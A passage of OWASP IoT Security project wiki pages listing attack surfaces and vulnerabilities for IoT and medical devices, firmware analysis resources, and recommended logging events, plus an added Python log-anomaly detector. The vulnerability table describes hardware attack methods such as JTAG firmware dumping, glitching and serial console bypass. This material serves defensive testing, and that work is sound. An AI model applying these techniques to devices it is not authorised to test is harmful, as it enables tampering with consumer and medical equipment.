** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known vulnerabilities (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified, bypassing almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow, or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, full console access to the device can be obtained<br />
* Usually, security measures include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way for people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
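<br />
To make the event list above concrete, the following is an added example (not part of the OWASP project) that runs a handful of these detections over constructed sample log lines. The log format, the thresholds and the event tuples are assumptions chosen for the example; the event names are the ones from the table.<br />

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (an assumption, not an OWASP format):
#   <ISO-8601 timestamp> <source IP> sid=<session id> <METHOD> <path> <status> [user=<name>]
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) sid=(?P<sid>\S+) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) (?P<status>\d{3})(?: user=(?P<user>\S+))?$"
)

# Tunable thresholds (assumed values; the wiki gives 3-5 failed logins as the lockout range)
ALLOWED_METHODS = {"GET", "POST"}
FAILED_PASSWORD_THRESHOLD = 5
LOGIN_RATE_WINDOW = timedelta(seconds=10)
LOGIN_RATE_THRESHOLD = 5

# Constructed sample: a password-guessing run that eventually succeeds, the session then
# reused from a second address, an unsupported HTTP method, and a forbidden direct fetch.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 sid=a1 POST /login 401 user=admin
2024-05-01T10:00:01 10.0.0.5 sid=a1 POST /login 401 user=admin
2024-05-01T10:00:02 10.0.0.5 sid=a1 POST /login 401 user=admin
2024-05-01T10:00:03 10.0.0.5 sid=a1 POST /login 401 user=admin
2024-05-01T10:00:04 10.0.0.5 sid=a1 POST /login 401 user=admin
2024-05-01T10:00:05 10.0.0.5 sid=a1 POST /login 200 user=admin
2024-05-01T10:00:06 10.0.0.5 sid=a1 GET /admin/config 200 user=admin
2024-05-01T10:00:07 10.0.0.9 sid=a1 GET /admin/config 200 user=admin
2024-05-01T10:01:00 10.0.0.7 sid=b2 TRACE /status 405
2024-05-01T10:02:00 10.0.0.8 sid=c3 GET /firmware/backup.bin 403
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["status"] = int(rec["status"])
    return rec


def detect_events(lines):
    """Return a list of (category, event, detail) tuples for the events found."""
    events = []
    failed_by_user = defaultdict(int)   # 401 responses on /login per username
    login_times = defaultdict(list)     # recent POST /login timestamps per source IP
    session_ips = {}                    # session id -> source IP last seen

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue

        # Request Exceptions: method outside what the device is meant to serve
        if rec["method"] not in ALLOWED_METHODS:
            events.append(("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method",
                           f"{rec['method']} {rec['path']} from {rec['ip']}"))

        # Session Exceptions: the same session id turns up from a different address
        prev_ip = session_ips.setdefault(rec["sid"], rec["ip"])
        if prev_ip != rec["ip"]:
            events.append(("Session Exceptions", "Source Location Changes During Session",
                           f"sid={rec['sid']} moved {prev_ip} -> {rec['ip']}"))
            session_ips[rec["sid"]] = rec["ip"]

        # Authentication Exceptions: attempt rate per IP (sliding window) and failures per user
        if rec["method"] == "POST" and rec["path"] == "/login":
            recent = [t for t in login_times[rec["ip"]] if rec["ts"] - t <= LOGIN_RATE_WINDOW]
            recent.append(rec["ts"])
            login_times[rec["ip"]] = recent
            if len(recent) == LOGIN_RATE_THRESHOLD:
                events.append(("Authentication Exceptions", "High Rate of Login Attempts",
                               f"{len(recent)} attempts from {rec['ip']} within {LOGIN_RATE_WINDOW}"))
            if rec["status"] == 401 and rec["user"]:
                failed_by_user[rec["user"]] += 1
                if failed_by_user[rec["user"]] == FAILED_PASSWORD_THRESHOLD:
                    events.append(("Authentication Exceptions", "Multiple Failed Passwords",
                                   f"{FAILED_PASSWORD_THRESHOLD} failures for user={rec['user']}"))

        # Administrative Mode Events: a successful request into the admin area
        if rec["path"].startswith("/admin/") and rec["status"] == 200:
            events.append(("Administrative Mode Events", "Device Entered Administrative Mode",
                           f"{rec['path']} by user={rec['user']} from {rec['ip']}"))

        # Access Control Exceptions: the device refused a resource requested directly
        if rec["status"] == 403:
            events.append(("Access Control Exceptions", "Forced Browsing Attempt",
                           f"{rec['path']} from {rec['ip']}"))
    return events


def event_counts(lines):
    """Count detected events by event name, e.g. for a dashboard or a unit test."""
    return Counter(event for _, event, _ in detect_events(lines))


if __name__ == "__main__":
    for category, event, detail in detect_events(SAMPLE_LOG.splitlines()):
        print(f"[{category}] {event}: {detail}")
```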
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems generally do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
